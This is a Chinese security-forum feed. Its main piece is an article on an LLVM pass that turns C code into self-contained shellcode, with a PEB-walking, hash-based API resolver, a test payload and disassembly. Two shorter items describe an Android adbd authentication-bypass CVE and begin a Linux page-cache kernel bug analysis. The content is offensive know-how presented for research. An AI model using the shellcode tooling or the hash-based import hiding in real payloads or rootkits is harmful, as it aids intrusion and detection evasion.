看雪学苑

https://bbs.kanxue.com/user-home-983513.htm

基于LLVM的通用自包含化(Shellcode)编译器开发思路

Tue, 12 May 2026 17:59:00 +0800

TeddyBe4r 2026-05-12 17:59 上海

看雪论坛作者ID：TeddyBe4r

这篇文章旨在帮助想要开发自己shellcode编译器的朋友，为你们提供思路与解决方案。由于文章产物的特殊性本文将不会提供代码，请各位读者在阅读完文章之后自行实现。

在x64系统的时代shellcode的开发变得极富有技巧性，由于x64的调用约定的改变与微软引入的shadow space的技术出现导致masm32汇编在64上部分具有效率的语法糖彻底失效，由于shadow space机制手写x64汇编会变得有些恶心，在去年我开发了一款分段式加载的Rootkit,其中很多功能代码都是通过网络传送并且加载到内存运行的，这也让我的RDK开发变得十分繁琐，于是便有了这篇文章的项目。

在现代编译器的环境下我们想要在原生编译器环境下写出shellcode是一个具有技巧的事情，我们要在代码层面抗优化，从譬如全局变量，数组赋值，数组，连续变量定义，连续变量赋值，swich-case，条件转移语句等等的代码结构上下功夫利用编译期不可知写法才能够有效规避一些具有全局特征的代码优化，在这之后还需要对抗MSVC的链接优化，以及一些安全检查譬如__chkstk等等。

本文基于 LLVM 实现了一套面向 Shellcode 的自包含编译框架，通过全局变量下沉、上下文透传、调用链重写消除全局与外部依赖，并结合编译期 API 哈希与Runtime动态符号解析，实现无导入表、无外部符号的纯位置无关代码生成，并且生成的Shellcode R3 R0都可以用。

整体架构流程

全局变量下沉与透传上下文结构化设计

在一开始做这个下沉的时候我还踩了一些坑，当时我直接把调用链上每一个函数都下沉了一份到栈上，这其实是错误的因为根据全局变量的语义如果每个函数都持有一份在自己的栈中那么这个变量将会退化为局部变量，在语义上就发生了根本性的变化所以在设计这个结构的时候我们要引入上下文透传机制。

在常规 C 语言程序中，全局变量与静态变量由操作系统加载器统一分配虚拟地址，并在进程启动时完成初始化，其访问依赖固定的全局符号地址与可执行文件的数据段布局。但在纯 Shellcode 执行环境下，程序不具备独立的进程地址空间管理能力、无加载器支持、无数据段权限初始化机制，直接保留全局变量会导致以下问题：全局地址硬编码导致无法位置无关执行、多份 Shellcode 实例间数据冲突、全局符号引入外部依赖破坏自包含性。

因此，需要通过全局变量下沉（Global Variable Lowering）技术，将分散的全局状态统一收拢为结构化上下文，并在调用链中透明传递。并且由于程序结构的特性只有一个Entry，所以我们在Entry的基础栈帧中插入下沉的GV变成CTX的形式在调用链中传播CTX指针这样就可以做到下沉且保持语义不变。

透我归纳为以下8步：

收集全局变量：遍历 Shellcode 入口函数及其完整调用链，筛选出被引用、非线程局部、非编译器内置、具备初始化器的有效全局变量，排除 LLVM 元数据等无关符号，形成待下沉全局变量列表。
构造上下文结构体：基于筛选后的全局变量，自动生成 ShellcodeCtx 结构体，结构体字段类型、顺序与待下沉全局变量严格对应，建立每个全局变量与结构体字段的一一映射关系，记录字段索引。
实例化上下文并初始化：在 Shellcode 入口函数的入口块，插入栈上分配指令创建 ShellcodeCtx 实例；采用递归常量展开与分块内联填充策略，逐字段将原全局变量的初始化值写入栈上结构体，避免依赖外部库函数。
重写非入口函数签名：为调用链中所有非入口函数追加 ShellcodeCtx 指针作为最后一个参数，生成新的函数签名及函数实例，保留原函数逻辑，仅新增上下文参数接收逻辑。
重写调用链中的调用点：遍历所有函数体内的调用指令，将原函数调用替换为对新函数的调用，在调用参数末尾追加当前函数的上下文指针（入口函数传栈上结构体地址，非入口函数传接收的上下文参数），实现上下文透传。
替换全局变量访问指令：遍历所有函数体，将对原全局变量的直接访问、经常量表达式封装的间接访问，全部替换为对 ShellcodeCtx 结构体的 GEP 字段索引访问，确保全局变量语义等价。
清理冗余符号：删除调用链中无引用的原函数实例、无引用的待下沉全局变量，避免冗余符号占用空间。
函数属性加固：为调用链中所有函数添加 no-builtins、no-stack-arg-probe 等属性，阻止编译器生成外部依赖代码（如 memset、__chkstk），确保上下文透传过程无额外依赖。

下图展示了透传前后的对比，以及透传之后的栈帧结构：

ShellcodeCtx 是一个由 Pass 自动生成的 packed 结构体，其字段顺序与收集到的全局变量顺序严格一致。每个字段的类型直接取自对应全局变量的 getValueType()（即去掉指针层的底层类型）。

函数上下文注入与调用链上下文传播

在完成全局变量收集与 ShellcodeCtx 类型构造之后，Pass 需要对调用链中每一个函数执行两类不同的处理：Entry 函数保持原有签名不变（loader 侧仍可通过 (void*)entry 取地址），在其入口块插入 alloca 实例化 ctx 并完成内联初始化；非 entry 函数则需要改写签名，在参数列表末尾追加 ShellcodeCtx* 参数，实现指针向下透传。

Entry 函数之所以保持签名不变，是因为 loader 侧通常以 (void*)entry 的形式提取 Shellcode 起始地址或计算代码长度，改变签名会破坏这一用法。

下面给出部分透传代码（addCtxParameter）

    Function* addCtxParameter(Function* F, StructType* ctxTy)
    {
        FunctionType* oldFT = F->getFunctionType();
        std::vector newParams(oldFT->param_begin(), oldFT->param_end());
        PointerType* ctxPtrTy = PointerType::getUnqual(ctxTy);
        newParams.push_back(ctxPtrTy);
        FunctionType* newFT = FunctionType::get(
            oldFT->getReturnType(), newParams, oldFT->isVarArg());
        Function* NF = Function::Create(
            newFT, F->getLinkage(), F->getAddressSpace(),
            F->getName() + ".ctx", F->getParent());
        NF->copyAttributesFrom(F);
        // 建立旧参数 -> 新参数映射
        ValueToValueMapTy VMap;
        auto NewArgIt = NF->arg_begin();
        for (auto& OldArg : F->args())
        {
            NewArgIt->setName(OldArg.getName());
            VMap[&OldArg] = &*NewArgIt;
            ++NewArgIt;
        }
        // 最后一个参数命名为 ctx
        NewArgIt->setName("ctx");
        // 克隆函数体
        SmallVector8> Returns;
        CloneFunctionInto(NF, F, VMap,
            /*ModuleLevelChanges=*/false, Returns);
        errs() << "[AddCtxParam] " << F->getName()
               << " -> " << NF->getName() << "\n";
        return NF;
    }

签名改写的具体实现是在 addCtxParameter() 中完成的：构造新的 FunctionType（在原参数列表末尾追加 ShellcodeCtx*），用 Function::Create() 创建新函数，通过 ValueToValueMapTy 建立旧参数到新参数的映射，最后调用 CloneFunctionInto() 将原函数体完整克隆到新函数中。旧函数在所有调用点重写完成并确认无引用后被 eraseFromParent() 删除。

调用点重写步骤如下: 遍历 fnRemap 映射，找到所有 CallInst 中调用了旧函数的位置，在参数列表末尾追加当前函数的 fnToCtxPtr（entry 传 alloca 地址，非 entry 传接收到的 ctx 参数），用 IRBuilder 构造新的 CallInst 并替换旧指令。

全局变量的访问替换在重写调用点之后进行，然后每个函数的入口块前置缓存 GEP 指令（避免重复生成），将所有对 @g_xx 的直接引用和 ConstantExpr 包裹的间接引用全部替换为 GEP ctxPtr, 0, fieldIdx。

Shellcode 调用链分析与全函数收集

Pass 的入口工作是定位所有 Shellcode 入口函数，随后以此为根节点递归展开完整的调用图。这两步共同决定了后续所有变换的作用域——只有被纳入调用链的函数才会被改写，链外的函数保持不变。

入口函数定位通过扫描 llvm.global.annotations 元数据实现。在 C 源码侧，开发者通过 __attribute__((annotate("shellcode"))) 标注入口函数，Clang 会将该注解以 ConstantStruct 数组的形式写入 IR 中的 llvm.global.annotations 全局变量，Pass 遍历该数组并比对注解字符串即可精确定位入口。

递归收集以 DFS 方式实现：对每个函数遍历其所有基本块内的全部 CallInst，取 getCalledFunction()，若被调函数有函数体（!isDeclaration()）且未曾访问，则递归进入。visited 集合（即最终的 chainFuncs）防止环状调用导致无限递归。值得注意的是我们在实现调用链分析的时候需要检测函数指针逃逸。

函数指针逃逸检测是非常重要的安全机制：由于 Pass 要改写所有非 entry 函数的签名，如果某函数的地址在改写前已被存入变量（store）或作为参数传给外部回调（call @qsort），那么运行时调用时签名不匹配会直接导致崩溃。

检测逻辑遍历每个链内函数的所有 Use，凡是出现在 CallInst 的 callee 位置之外的用法，且不属于 LLVM 元数据（llvm.global.annotations / llvm.used）的，均视为逃逸并终止编译。

检测到逃逸后，Pass 会通过 report_fatal_error() 中止整个编译，并打印逃逸点的具体指令与所在函数。

修复方法：将间接调用改写为直接的 switch/if 分派，这里也是Shellcode框架的写法要求。

字节数组分块聚合与内联初始化优化

这里的优化也很重要因为，在把全局变量的初始化数据写入栈上 ShellcodeCtx 时，朴素做法是对每个字节生成一条 store i8——对于 1024 字节的查找表这将产生 1024 条指令，代码体积急剧膨胀，且 LLVM 后端极有可能将密集的 store i8 序列重新合成为 call memset 或 call memcpy，引入外部符号依赖，彻底破坏 Shellcode 的自包含性。

且绝对禁止使用 llvm.memset intrinsic。LLVM 后端对超过约 128 字节的 llvm.memset 会展开为 call memset，引入 libc 依赖。即便是 inline 的 intrinsic 形式也存在此风险，因此必须完全绕开。所以我们给出如下的策略。

分块聚合的核心逻辑实现：通过 ConstantDataArray::getRawDataValues() 获取原始字节流，按 8 字节边界切分，以小端字节序拼装为 uint64_t 立即数，通过 GEP i8* basePtr, offset 定位目标地址后 bitcast 为 i64*，生成 MaybeAlign(1) 的非对齐 store。这保证了字节精确语义的同时将指令数压缩到 ⌈n/8⌉。

零填充的大数组或大尺寸变量实现:通过 BasicBlock::splitBasicBlock() 手动构造 CFG：将当前插入点之后的指令切分到新块，在中间插入 loop_bb（含 PHI + condBr），后端面对规整的计数器循环有机会优化为 REP STOSQ，最终生成的机器码体积为 O(1)，与零填充大小无关。

编译期 API 哈希与运行时动态符号解析

在这里我们要解决的问题是Shellcode 不具备 PE 导入表，无法通过常规链接器符号机制调用 Windows API。Pass 的最后阶段将调用链中所有对外部函数声明的 CallInst 替换为基于哈希的动态解析模式，消除全部外部符号引用。

整个机制分为两个完全解耦的部分：编译期由 Pass 完成字符串哈希化与 IR 重写；运行时由用户提供的 resolve_api 函数完成 PEB 遍历与符号查找。两者通过一个 64 位哈希值（djb2）对接，Shellcode 中不存在任何 API 名称字符串。这样有个好处就是不论用户将该编译器用于什么环境只要API能通过譬如PEB 或者ssdt表的形式获得就完全能够生成对应环境下的Shellcode, 内核可以通过ssdt,R3通过PEB walker。

IR 重写的具体步骤：扫描函数体内所有调用外部声明函数的 CallInst（跳过 llvm.* intrinsic 与 resolve_api 自身），在每个 call site 前插入 call i64 @resolve_api(i64 hash_imm)，将返回的整数通过 IRBuilder::CreateIntToPtr() 转换为原函数指针类型，再构造新的间接 CallInst 替换原有直接调用并删除旧指令。

resolve_api 由用户实现，Pass 仅负责编译期哈希化与 call site 重写，不绑定特定的运行时解析逻辑。用户可根据目标环境选择 PEB walk、自定义 TEB 遍历或其他符号解析方式，只要函数签名为 i64 resolve_api(i64) 即可。

效果展示

测试代码：

// test_payload_full.c
// CShellCodePass 综合测试用例
//
// 覆盖场景:
//   [GV-1]  字符串字面量(只读, .rdata)
//   [GV-2]  可写全局标量(int)
//   [GV-3]  可写全局数组
//   [GV-4]  零初始化全局(.bss)
//   [GV-5]  结构体全局
//   [GV-6]  函数局部 static 变量(也是全局)
//   [CHAIN] 多层调用链 entry -> A -> B -> C
//   [API]   多个外部 API,部分共享同一个名字
//   [SHARE] 多个 helper 共享同一个全局(测 ctx 透传一致性)
//   [BIG]   大字节数组(测 8 字节 chunk 化优化)
//
// 使用 SHELLCODE_FUNC 标注 entry,helpers 不标注但会被调用链拉进来
#define WIN32_LEAN_AND_MEAN
#include 
#include 
#include 
#include 
#define SHELLCODE_FUNC __attribute__((annotate("shellcode")))
// ============================================================
//  resolve_api 部分(和你原版一致,略写)
// ============================================================
staticuint64_t gvr_djb2(constchar *s) {
uint64_t h = 5381;
    while (*s) h = ((h << 5) + h) + (unsignedchar)(*s++);
    return h;
}
staticuint64_t scan_module(BYTE *base, uint64_t target);
staticuint64_t resolve_forwarder(constchar *fwd);
uint64_t resolve_api(uint64_t target) {
    PPEB peb = (PPEB)__readgsqword(0x60);
    if (!peb || !peb->Ldr) return 0;
    PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
    for (PLIST_ENTRY p = head->Flink; p != head; p = p->Flink) {
        LDR_DATA_TABLE_ENTRY *e =
            CONTAINING_RECORD(p, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        BYTE *base = (BYTE *)e->DllBase;
        if (!base) continue;
uint64_t addr = scan_module(base, target);
        if (addr) return addr;
    }
    return 0;
}
staticuint64_t scan_module(BYTE *base, uint64_t target) {
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)base;
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
    PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE) return 0;
    IMAGE_DATA_DIRECTORY *dir =
        &nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (!dir->VirtualAddress || !dir->Size) return 0;
    PIMAGE_EXPORT_DIRECTORY exp =
        (PIMAGE_EXPORT_DIRECTORY)(base + dir->VirtualAddress);
    DWORD *names = (DWORD *)(base + exp->AddressOfNames);
    DWORD *funcs = (DWORD *)(base + exp->AddressOfFunctions);
    WORD  *ords  = (WORD  *)(base + exp->AddressOfNameOrdinals);
    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
constchar *n = (constchar *)(base + names[i]);
        if (gvr_djb2(n) != target) continue;
        WORD ord = ords[i];
        DWORD rva = funcs[ord];
        BYTE *addr = base + rva;
        if (rva >= dir->VirtualAddress &&
            rva <  dir->VirtualAddress + dir->Size) {
            return resolve_forwarder((constchar *)addr);
        }
        return (uint64_t)(uintptr_t)addr;
    }
    return 0;
}
staticuint64_t resolve_forwarder(constchar *fwd) {
constchar *dot = fwd;
    while (*dot && *dot != '.') dot++;
    if (*dot != '.' || !dot[1]) return 0;
    return resolve_api(gvr_djb2(dot + 1));
}
// ============================================================
//  各种全局变量(测试 GV-1 ~ GV-5)
// ============================================================
// [GV-1] 字符串字面量 —— 实际是 private constant,Clang 自动产生的
// 这些不会显式声明为全局,但 IR 里有 @.str / @.str.1 等
// [GV-2] 可写全局标量
int   g_counter = 0;
DWORD g_flags   = 0x12345678;
// [GV-3] 可写全局数组
char g_msg_buf[64] = "default message";
// [GV-4] 零初始化的大 buffer(测试 ChunkedInit + 零字段)
unsignedchar g_workspace[256] = { 0 };
// [GV-5] 结构体全局
typedef struct {
    DWORD magic;
    DWORD size;
char  tag[16];
} Header;
Header g_header = { 0xDEADBEEF, 256, "shellcode-v1" };
// [BIG] 大块字节数据(测 chunk 化压缩效果)
// 这种数据典型用法:嵌入式密钥、shellcode 模板、协议常量
constunsignedchar g_key[64] = {
    0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
    0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
};
// ============================================================
//  调用链 helpers(不加 SHELLCODE_FUNC)
//  这些会被 collectCallChain 拉进来,加 ctx 参数
// ============================================================
// [CHAIN-C] 最深层:操作 g_workspace 和 g_counter
//   - 测试 [SHARE]: 同一全局被多个函数引用
//   - 测试 [GV-2]/[GV-4]
staticvoid deep_helper(int idx, char value) {
    if (idx >= 0 && idx < (int)sizeof(g_workspace)) {
        g_workspace[idx] = (unsignedchar)value;
        g_counter++;                 // 共享变量
    }
}
// [CHAIN-B] 中间层:调用 deep_helper,操作 g_header
staticvoid mid_helper(constchar *src, int n) {
    g_header.size = (DWORD)n;
    for (int i = 0; i < n && i < 16; i++) {
        g_header.tag[i] = src[i];    // 写结构体字段
    }
    for (int i = 0; i < n; i++) {
        deep_helper(i, src[i]);      // 链式调用
    }
}
// [CHAIN-A] 顶层 helper:调用 mid_helper,直接也调用外部 API
//   - 测试 ctx 透传 entry -> A -> B -> C
staticvoid top_helper(void) {
    g_flags |= 0x80000000;           // 修改另一个全局
    // 这里调用了外部 API,Pass 应该把它替换成 resolve_api
    Sleep(10);
    // [GV-1] 字符串字面量
    mid_helper("ctx_test_payload", 16);
    // [GV-6] 函数局部 static
staticint call_count = 0;
    call_count++;
    g_counter += call_count;
}
// ============================================================
//  入口函数
// ============================================================
SHELLCODE_FUNC
void my_payload(void) {
    // [GV-1] 字符串字面量
    LoadLibraryA("user32.dll");
    // 直接读全局
    g_counter = 1;
    g_flags = 0xCAFEBABE;
    // 调用链
    top_helper();
    // 用到 g_msg_buf 和 g_key
    for (int i = 0; i < 16; i++) {
        g_msg_buf[i] = (char)('A' + (g_key[i] & 0x0F));
    }
    g_msg_buf[16] = '\0';
    // 多次调用同一 API,测 hash 缓存(Pass 不缓存,每次都 resolve,能跑就行)
    MessageBoxA(NULL, g_msg_buf, "GVRuntime", MB_OK);
    MessageBoxA(NULL, "second box", "GVRuntime", MB_OK);
    // 用到 g_header(结构体)和 g_workspace[0]
    if (g_header.magic == 0xDEADBEEF && g_workspace[0] != 0) {
        MessageBoxA(NULL, "header & workspace OK", "GVRuntime", MB_OK);
    }
}
// ============================================================
//  main 不加 SHELLCODE_FUNC,普通编译
// ============================================================
int main(void) {
    my_payload();
    return 0;
}

编译过程的GV提取以及优化

运行截图：

编译后的函数

my_payload

我们在这里关注核心的callAPI,看看他会变成什么样

是正常的call跟进去：

.text:0000000000401560 resolve_api     proc near               ; CODE XREF: my_payload+27D↓p
.text:0000000000401560                                         ; my_payload+30D↓p ...
.text:0000000000401560
.text:0000000000401560 var_50          = qword ptr -50h
.text:0000000000401560 var_48          = qword ptr -48h
.text:0000000000401560 var_40          = qword ptr -40h
.text:0000000000401560 var_38          = qword ptr -38h
.text:0000000000401560 var_30          = qword ptr -30h
.text:0000000000401560 var_28          = qword ptr -28h
.text:0000000000401560 var_20          = qword ptr -20h
.text:0000000000401560 var_18          = qword ptr -18h
.text:0000000000401560 var_10          = qword ptr -10h
.text:0000000000401560 var_4           = dword ptr -4
.text:0000000000401560
.text:0000000000401560                 sub     rsp, 78h
.text:0000000000401564                 mov     [rsp+78h+var_20], rcx
.text:0000000000401569                 mov     [rsp+78h+var_4], 60h ; '`'
.text:0000000000401571                 mov     eax, [rsp+78h+var_4]
.text:0000000000401575                 mov     rax, gs:[rax]
.text:0000000000401579                 mov     [rsp+78h+var_10], rax
.text:000000000040157E                 mov     rax, [rsp+78h+var_10]
.text:0000000000401583                 mov     [rsp+78h+var_28], rax
.text:0000000000401588                 cmp     [rsp+78h+var_28], 0
.text:000000000040158E                 jz      loc_4015A4
.text:0000000000401594                 mov     rax, [rsp+78h+var_28]
.text:0000000000401599                 cmp     qword ptr [rax+18h], 0
.text:000000000040159E                 jnz     loc_4015B2
.text:00000000004015A4
.text:00000000004015A4 loc_4015A4:                             ; CODE XREF: resolve_api+2E↑j
.text:00000000004015A4                 mov     [rsp+78h+var_18], 0
.text:00000000004015AD                 jmp     loc_401668
.text:00000000004015B2 ; ---------------------------------------------------------------------------
.text:00000000004015B2
.text:00000000004015B2 loc_4015B2:                             ; CODE XREF: resolve_api+3E↑j
.text:00000000004015B2                 mov     rax, [rsp+78h+var_28]
.text:00000000004015B7                 mov     rax, [rax+18h]
.text:00000000004015BB                 add     rax, 20h ; ' '
.text:00000000004015BF                 mov     [rsp+78h+var_30], rax
.text:00000000004015C4                 mov     rax, [rsp+78h+var_30]
.text:00000000004015C9                 mov     rax, [rax]
.text:00000000004015CC                 mov     [rsp+78h+var_38], rax
.text:00000000004015D1
.text:00000000004015D1 loc_4015D1:                             ; CODE XREF: resolve_api+FA↓j
.text:00000000004015D1                 mov     rax, [rsp+78h+var_38]
.text:00000000004015D6                 cmp     rax, [rsp+78h+var_30]
.text:00000000004015DB                 jz      loc_40165F
.text:00000000004015E1                 mov     rax, [rsp+78h+var_38]
.text:00000000004015E6                 xor     ecx, ecx
.text:00000000004015E8                 mov     rdx, rcx
.text:00000000004015EB                 add     rdx, 10h
.text:00000000004015EF                 sub     rcx, rdx
.text:00000000004015F2                 add     rax, rcx
.text:00000000004015F5                 mov     [rsp+78h+var_40], rax
.text:00000000004015FA                 mov     rax, [rsp+78h+var_40]
.text:00000000004015FF                 mov     rax, [rax+30h]
.text:0000000000401603                 mov     [rsp+78h+var_48], rax
.text:0000000000401608                 cmp     [rsp+78h+var_48], 0
.text:000000000040160E                 jnz     loc_401619
.text:0000000000401614                 jmp     loc_40164D
.text:0000000000401619 ; ---------------------------------------------------------------------------
.text:0000000000401619
.text:0000000000401619 loc_401619:                             ; CODE XREF: resolve_api+AE↑j
.text:0000000000401619                 mov     rcx, [rsp+78h+var_48]
.text:000000000040161E                 mov     rdx, [rsp+78h+var_20]
.text:0000000000401623                 call    scan_module
.text:0000000000401628                 mov     [rsp+78h+var_50], rax
.text:000000000040162D                 cmp     [rsp+78h+var_50], 0
.text:0000000000401633                 jz      loc_401648
.text:0000000000401639                 mov     rax, [rsp+78h+var_50]
.text:000000000040163E                 mov     [rsp+78h+var_18], rax
.text:0000000000401643                 jmp     loc_401668
.text:0000000000401648 ; ---------------------------------------------------------------------------
.text:0000000000401648
.text:0000000000401648 loc_401648:                             ; CODE XREF: resolve_api+D3↑j
.text:0000000000401648                 jmp     $+5
.text:000000000040164D ; ---------------------------------------------------------------------------
.text:000000000040164D
.text:000000000040164D loc_40164D:                             ; CODE XREF: resolve_api+B4↑j
.text:000000000040164D                                         ; resolve_api:loc_401648↑j
.text:000000000040164D                 mov     rax, [rsp+78h+var_38]
.text:0000000000401652                 mov     rax, [rax]
.text:0000000000401655                 mov     [rsp+78h+var_38], rax
.text:000000000040165A                 jmp     loc_4015D1
.text:000000000040165F ; ---------------------------------------------------------------------------
.text:000000000040165F
.text:000000000040165F loc_40165F:                             ; CODE XREF: resolve_api+7B↑j
.text:000000000040165F                 mov     [rsp+78h+var_18], 0
.text:0000000000401668
.text:0000000000401668 loc_401668:                             ; CODE XREF: resolve_api+4D↑j
.text:0000000000401668                                         ; resolve_api+E3↑j
.text:0000000000401668                 mov     rax, [rsp+78h+var_18]
.text:000000000040166D                 add     rsp, 78h
.text:0000000000401671                 retn
.text:0000000000401671 resolve_api     endp

其他的都是如此都已经完全自包含了，里面调用的scan_model由于论坛的最大字符上限我用图片粘贴出来。

经过透传后的hash函数：

forward：

可以看到在全部调用中没有出现任何的影响自包含性的代码出现，所以可以直接抠出来当成shellcode使用。

本文所提到的技术不能用于非法用途，请各位读者自重，如果发生任何违法犯罪事件与本作者无关。

看雪ID：TeddyBe4r

*本文为看雪论坛精华文章，由 TeddyBe4r原创，转载请注明来自看雪社区

第十届安全开发者峰会【议题征集】-欢迎投稿

# 往期推荐

球分享

球点赞

球在看

点击阅读原文查看更多

安卓惊现零点击核弹漏洞！远程Shell权限被轻易窃取，PoC已公开

Tue, 12 May 2026 17:59:00 +0800

看雪学苑 2026-05-12 17:59 上海

安卓adbd零点击漏洞PoC发布，可远程获取设备权限

2026年5月，谷歌发布的Android安全公告中，曝光了一个零点击高危漏洞（CVE-2026-0073），该漏洞存在于安卓系统核心的adbd守护进程中，已被BARGHEST安全研究团队披露并公开了完整的PoC利用代码。这意味着，攻击者只需与目标设备处于同一网络环境，无需用户任何操作，就能悄无声息地获取设备的完整shell访问权限，将开发者调试工具变成远程控制的隐形后门。

漏洞根源：加密验证逻辑的致命缺陷

这个灾难性漏洞的核心在于adbd_tls_verify_cert函数中的加密逻辑错误，该函数负责验证无线ADB连接的客户端证书。现代安卓设备的无线调试功能依赖双向TLS认证机制，确保只有经过配对的可信设备才能连接。

正常流程中，系统会使用EVP_PKEY_cmp API比较客户端证书公钥与设备信任存储中的授权RSA密钥。但当攻击者提供非RSA证书（如EC P-256或Ed25519）时，该API会返回-1表示算法不匹配。而安卓底层C++实现中，所有非零整数都被视为布尔值true，导致系统错误地将攻击者的证书判定为可信，直接绕过了身份验证环节。

攻击流程：三步即可突破设备防线

尽管漏洞原理看似简单，但成功利用需要精准操控协议流程：

1. 建立TCP连接：攻击者首先连接目标设备的5555端口（ADB默认端口）

2. 协商STLS升级：成功完成安全传输层协议升级

3. 提交恶意证书：发送跨算法证书绕过验证，建立加密隧道

4. 获取shell权限：在加密通道中恢复ADB通信，打开远程shell，获得shell用户执行权限

一旦攻击成功，攻击者可绕过应用沙箱限制，执行以下操作：

提取短信、通讯录、照片等敏感个人信息
静默安装恶意应用，劫持设备功能
修改系统设置，植入持久化后门，为后续攻击铺路

影响范围与利用条件

该漏洞主要影响Android 14、15和16版本设备，且需满足以下前提条件才能被利用：

1. 目标设备已启用开发者选项

2. 无线调试（ADB over TCP）功能处于开启状态并暴露在网络中

3. 设备信任存储中至少存在一个已配对的RSA主机密钥

4. 攻击者与目标设备处于同一网络，能够访问5555端口

面对这一严重威胁，安卓用户和企业管理员应立即采取以下防护措施：

1. 优先安装安全补丁：尽快更新设备至2026年5月安全补丁版本，这是彻底修复漏洞的唯一方法

2. 关闭无线调试：在不可信网络环境（如公共Wi-Fi）中，务必关闭无线调试功能

3. 撤销未知授权：清理设备中已授权的未知调试主机，减少攻击面

4. 禁用开发者选项：非开发需求时，完全关闭开发者选项，从根源上阻止此类攻击

移动设备的安全边界正在不断受到挑战。即使是安卓系统核心组件，也可能存在致命缺陷。用户应保持安全意识，及时更新系统，谨慎使用开发者功能，避免在公共网络环境中暴露敏感服务端口。

资讯来源：BARGHEST Security Research & Google Android Security Bulletin (May 2026)

球分享

球点赞

球在看

点击阅读原文查看更多

https://bbs.kanxue.com/user-home-860174.htm

Copy Fail 深度研究：Linux 页缓存漏洞的根因、利用与检测

Mon, 11 May 2026 17:59:00 +0800

0xlane 2026-05-11 17:59 上海

看雪论坛作者ID：0xlane

从 Crypto 子系统的一个优化 commit，到 9 年后的任意文件页缓存覆写

一、引言

2026 年 4 月底，安全研究员Taeyang Lee公开披露了一个编号为CVE-2026-31431的 Linux 内核漏洞，并为其取了一个颇具讽刺意味的名字——Copy Fail。

这个名字精确地概括了漏洞的本质：2017 年，一位内核开发者为了修复 AF_ALG 加密接口中"AAD 数据没有从 src 复制到 dst"的 bug，引入了一个 in-place 优化。这个优化本身完全合理，但它无意中打破了内核 crypto 子系统中另一个模块 (authencesn) 长期以来的一个隐含假设——"目标 buffer 是连续的内核内存，向其中写几个字节不会造成任何副作用"。

当这两个独立子系统在splice()的帮助下与Page Cache交汇时，一个无特权的本地用户可以向系统中任意可读文件的页面缓存写入 4 字节可控数据。

这不是通常意义上的内存越界写或 UAF。它的危害更加隐蔽和深远：

本地提权
多次调用覆盖/usr/bin/su的 ELF 头部 → root shell
零特权跨容器攻击
同一宿主机上不同 namespace 的容器共享镜像层的 page cache → 一个容器可以破坏另一个容器的二进制文件
绕过只读挂载
文件只需O_RDONLY打开即可触发页面缓存写入 → readOnly volume 形同虚设
默认安全配置全面失守
Docker/Kubernetes 的默认 seccomp profile 和 SELinux targeted 策略均不阻止漏洞利用

漏洞影响 2017 年至 2026 年之间的所有主流 Linux 发行版内核（CVSS 7.8 High），持续潜伏了近 9 年。

时间线：

本文将从漏洞触发的前置知识开始，逐步深入根因分析、PoC 原理与内核级动态验证，随后系统性地探索宿主机提权和容器环境下的各类攻击路径及其可行性边界，最后给出防御方案和基于O_DIRECT+fanotify的页缓存完整性检测方案。

二、背景知识

理解 Copy Fail 需要几个前置概念。它们之间存在层层依赖关系：

Scatterlist (SGL)    AEAD Crypto            Page Cache
     |                |       |                |
scatterwalk          AAD  authencesn        splice()
     |                |       |                |
     +--------+-------+       |                |
              |               |                |
          AF_ALG -------------+                |
              |                                |
          algif_aead --------------------------+

下面逐一展开。

2.1 Page Cache：Linux 的全局文件缓存

当进程通过read()读取/usr/bin/cat时，内核不会每次都去磁盘拿数据。它会先检查一块叫做Page Cache的内存区域——如果文件的对应页面已经缓存在内存中，就直接返回缓存数据。

Page Cache 的几个关键特性与本漏洞直接相关：

全局共享。Page Cache 以(inode, page_offset)为 key 索引，不属于任何特定进程。同一台机器上的所有进程，只要访问的是同一个 inode，就会命中同一份 page cache。进程 A 通过read()将某个文件加载到 page cache 后，进程 B 读取同一文件时直接命中缓存，无需再次访问磁盘。

回写机制。对于通过正常write()路径产生的修改，内核会将对应的 page 标记为 dirty，稍后由回写线程（pdflush / writeback）异步刷到磁盘。但如果某种内核路径绕过了 VFS 层直接修改了 page cache 页面，dirty 标记不会被设置——修改只存在于内存中，重启或drop_caches后丢失。

即时可见。一旦 page cache 中的某个页面被修改（无论通过何种路径），所有后续的read()调用都会立即看到修改后的内容。这包括同一台机器上的其他进程，也包括容器环境下通过 overlayfs 共享同一底层 inode 的进程（详见 Section 6.1）。

2.2 Scatterlist：分散-聚集列表

在内核中，一段逻辑连续的数据（比如 10KB 的加密载荷）在物理内存中通常分布在多个不连续的 4KB 页面上。为了描述"这段数据由哪些页面的哪些偏移组成"，内核使用Scatterlist（SGL，分散-聚集列表）。

每个struct scatterlistentry 描述一段连续的物理内存区域：

struct scatterlist {
unsignedlong   page_link;  // 指向 page 结构（或 CHAIN 到下一个 SGL 数组）
unsignedint    offset;     // 页面内的起始偏移
unsignedint    length;     // 数据长度
};

当一个 SGL 数组不够用时，可以通过SG_CHAIN机制链接多个数组：最后一个 entry 的page_link不再指向数据页面，而是指向下一个 SGL 数组的起始地址。遍历 SGL 时，scatterwalk迭代器负责透明地处理这种链式结构。

这个设计本身没有问题。但当 SGL 中的某些 entry 指向的不是普通的内核分配内存，而是page cache 中的页面时，对 SGL 的写操作就等于直接修改了文件的缓存内容——这正是 Copy Fail 的核心利用点。

2.3 splice：零拷贝的代价

